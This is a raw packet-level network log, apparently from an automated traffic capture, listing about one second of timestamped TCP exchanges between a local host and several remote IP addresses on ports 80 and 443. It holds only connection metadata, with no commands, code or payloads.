Nov 11, 2024 10:33:23.850155115 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.850162983 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850173950 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.850177050 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850188971 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850200891 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850202084 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.850220919 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.850244999 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850248098 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.850306034 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850331068 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850342989 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850368977 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850377083 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.850382090 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850389004 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.850393057 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850405931 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850425005 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.850439072 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850450993 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.850450993 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850464106 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850475073 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850488901 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850502968 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.850517988 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850542068 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.850547075 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850558043 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850591898 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.850624084 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850625992 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.850642920 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850655079 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850666046 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850677967 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850692034 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.850703955 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.850738049 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.850758076 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850769997 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850780964 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850804090 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850815058 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.850816011 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850833893 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850845098 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850847006 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.850857019 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850879908 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.850898027 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.850912094 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.850935936 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.851027012 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851044893 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851056099 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851067066 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851080894 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851098061 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.851106882 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851119041 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851124048 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.851130962 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851141930 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851146936 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.851152897 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851180077 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851181984 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.851190090 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851201057 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851208925 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.851212978 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851226091 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851227999 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.851258993 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.851258993 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851274014 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851284027 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851317883 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.851327896 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.851342916 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851360083 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851372957 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851382971 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851385117 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.851396084 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851416111 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.851438046 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.851473093 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851485968 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851496935 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851506948 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851519108 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851528883 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851550102 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.851550102 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.851564884 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851576090 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851583958 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.851588011 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851599932 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851610899 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851619959 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851620913 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.851633072 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.851650953 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.851672888 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.852077961 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.852088928 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.852121115 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.852127075 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.852160931 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.852268934 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.852279902 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.852289915 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.852302074 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.852312088 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.852319956 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.852324009 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.852336884 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.852344990 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.852349043 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.852356911 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.852360964 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.852374077 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.852375031 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.852396965 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.852407932 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.852408886 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.852421045 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.852432966 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.852432966 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.852443933 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.852452040 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.852490902 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.865170956 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.865237951 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.865272045 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.865288019 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.865298986 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.865309000 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.865317106 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.865320921 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.865333080 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.865336895 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.865344048 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.865376949 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.865417004 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.865432978 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.865530014 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.865541935 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.865552902 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.865564108 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.865576029 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.865590096 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.865612984 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.865614891 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.865636110 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.865643978 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.865662098 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.865673065 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.865675926 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.865683079 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.865685940 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.865695000 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.865701914 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.865705967 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.865716934 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.865724087 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.865730047 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.865741014 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.865751028 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.865751982 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.865761995 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.865771055 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.865801096 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.875333071 CET	443	49808	23.200.0.34	192.168.2.5
Nov 11, 2024 10:33:23.878428936 CET	443	49814	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.878772020 CET	49814	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.878796101 CET	443	49814	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.878870964 CET	443	49812	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.878873110 CET	443	49810	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.879059076 CET	49812	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.879066944 CET	443	49812	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.879177094 CET	443	49814	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.879204035 CET	49810	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.879211903 CET	443	49810	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.879268885 CET	443	49813	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.879300117 CET	443	49811	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.879467964 CET	49808	443	192.168.2.5	23.200.0.34
Nov 11, 2024 10:33:23.879467964 CET	49797	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.879475117 CET	443	49808	23.200.0.34	192.168.2.5
Nov 11, 2024 10:33:23.879935980 CET	49814	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.880033016 CET	443	49814	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.880125046 CET	443	49812	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.880206108 CET	49812	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.880232096 CET	443	49810	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.880290985 CET	49810	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.880582094 CET	49811	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.880592108 CET	443	49811	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.880796909 CET	49813	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.880805969 CET	443	49813	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.881040096 CET	49812	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.881170034 CET	49814	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.881210089 CET	443	49812	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.881300926 CET	443	49813	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.881455898 CET	49812	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.881464958 CET	443	49812	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.881625891 CET	443	49811	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.881685972 CET	49811	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.881686926 CET	49813	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.881772041 CET	443	49813	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.882071972 CET	49810	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.882194996 CET	443	49810	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.882241964 CET	49813	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.882328987 CET	49810	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.882335901 CET	443	49810	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.882859945 CET	49811	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.882936954 CET	443	49811	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.882958889 CET	49811	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.914160967 CET	49821	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.914176941 CET	443	49821	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.914252043 CET	49821	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.914797068 CET	49822	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.914812088 CET	443	49822	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.914983034 CET	49821	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.914994955 CET	443	49821	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.915047884 CET	49822	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.915637016 CET	49822	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.915647984 CET	443	49822	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.916235924 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.927325964 CET	443	49811	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.927337885 CET	443	49814	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.927350044 CET	443	49813	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.927601099 CET	443	49807	20.1.248.118	192.168.2.5
Nov 11, 2024 10:33:23.927983046 CET	49807	443	192.168.2.5	20.1.248.118
Nov 11, 2024 10:33:23.941553116 CET	443	49809	20.110.205.119	192.168.2.5
Nov 11, 2024 10:33:23.962018013 CET	443	49805	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:23.964808941 CET	49810	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.971430063 CET	443	49812	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.971494913 CET	443	49812	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.971944094 CET	443	49813	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.971954107 CET	443	49810	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.971963882 CET	443	49810	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.971982956 CET	443	49810	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.972039938 CET	443	49810	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.972045898 CET	443	49813	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.972045898 CET	49812	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.972093105 CET	49810	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.972281933 CET	443	49811	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.972323895 CET	49813	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.972337961 CET	443	49811	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.972361088 CET	49811	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.972397089 CET	49811	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.982069969 CET	49809	443	192.168.2.5	20.110.205.119
Nov 11, 2024 10:33:23.982085943 CET	443	49809	20.110.205.119	192.168.2.5
Nov 11, 2024 10:33:23.982603073 CET	49805	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:23.982614994 CET	443	49805	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:23.983149052 CET	49807	443	192.168.2.5	20.1.248.118
Nov 11, 2024 10:33:23.983158112 CET	443	49807	20.1.248.118	192.168.2.5
Nov 11, 2024 10:33:23.983532906 CET	443	49805	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:23.983609915 CET	49805	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:23.983668089 CET	443	49809	20.110.205.119	192.168.2.5
Nov 11, 2024 10:33:23.983738899 CET	49809	443	192.168.2.5	20.110.205.119
Nov 11, 2024 10:33:23.989582062 CET	49808	443	192.168.2.5	23.200.0.34
Nov 11, 2024 10:33:23.990382910 CET	49809	443	192.168.2.5	20.110.205.119
Nov 11, 2024 10:33:23.990539074 CET	443	49809	20.110.205.119	192.168.2.5
Nov 11, 2024 10:33:23.992357016 CET	49805	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:23.992424965 CET	443	49805	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:23.994720936 CET	49809	443	192.168.2.5	20.110.205.119
Nov 11, 2024 10:33:23.994729042 CET	443	49809	20.110.205.119	192.168.2.5
Nov 11, 2024 10:33:23.995076895 CET	49805	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:23.995086908 CET	443	49805	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:23.995168924 CET	49805	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:23.995197058 CET	443	49805	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:24.047015905 CET	443	49814	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.047041893 CET	443	49814	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.047061920 CET	443	49814	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.047152996 CET	49814	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.047179937 CET	443	49814	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.047225952 CET	49814	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.054646015 CET	443	49814	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.054667950 CET	443	49814	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.054702997 CET	443	49814	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.054769993 CET	49814	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.054795027 CET	443	49814	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.054819107 CET	49814	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.058367968 CET	49823	443	192.168.2.5	20.1.248.118
Nov 11, 2024 10:33:24.058403015 CET	443	49823	20.1.248.118	192.168.2.5
Nov 11, 2024 10:33:24.058687925 CET	49823	443	192.168.2.5	20.1.248.118
Nov 11, 2024 10:33:24.059350014 CET	49823	443	192.168.2.5	20.1.248.118
Nov 11, 2024 10:33:24.059367895 CET	443	49823	20.1.248.118	192.168.2.5
Nov 11, 2024 10:33:24.066952944 CET	49812	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.066977978 CET	443	49812	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.067363024 CET	49824	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.067384005 CET	443	49824	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.067643881 CET	49824	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.068068027 CET	49824	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.068082094 CET	443	49824	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.071441889 CET	443	49815	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.072431087 CET	49815	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.072439909 CET	443	49815	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.073647022 CET	443	49815	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.073719025 CET	49815	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.074040890 CET	49815	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.074137926 CET	443	49815	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.074282885 CET	49815	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.074290037 CET	443	49815	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.086909056 CET	49813	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.086914062 CET	443	49813	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.087435961 CET	49825	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.087457895 CET	443	49825	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.087551117 CET	49825	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.087984085 CET	49825	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.087996960 CET	443	49825	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.091219902 CET	49810	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.091228008 CET	443	49810	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.091747046 CET	49811	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.091753960 CET	443	49811	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.109958887 CET	443	49809	20.110.205.119	192.168.2.5
Nov 11, 2024 10:33:24.110075951 CET	49809	443	192.168.2.5	20.110.205.119
Nov 11, 2024 10:33:24.112323046 CET	49809	443	192.168.2.5	20.110.205.119
Nov 11, 2024 10:33:24.112335920 CET	443	49809	20.110.205.119	192.168.2.5
Nov 11, 2024 10:33:24.129968882 CET	443	49814	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.130000114 CET	443	49814	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.130059958 CET	49814	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.130086899 CET	443	49814	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.130135059 CET	49814	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.135768890 CET	443	49814	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.135790110 CET	443	49814	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.135869980 CET	443	49814	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.135912895 CET	49814	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.135977030 CET	49814	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.136270046 CET	49814	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.136293888 CET	443	49814	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.173921108 CET	49815	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.183233023 CET	443	49805	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:24.237848997 CET	443	49808	23.200.0.34	192.168.2.5
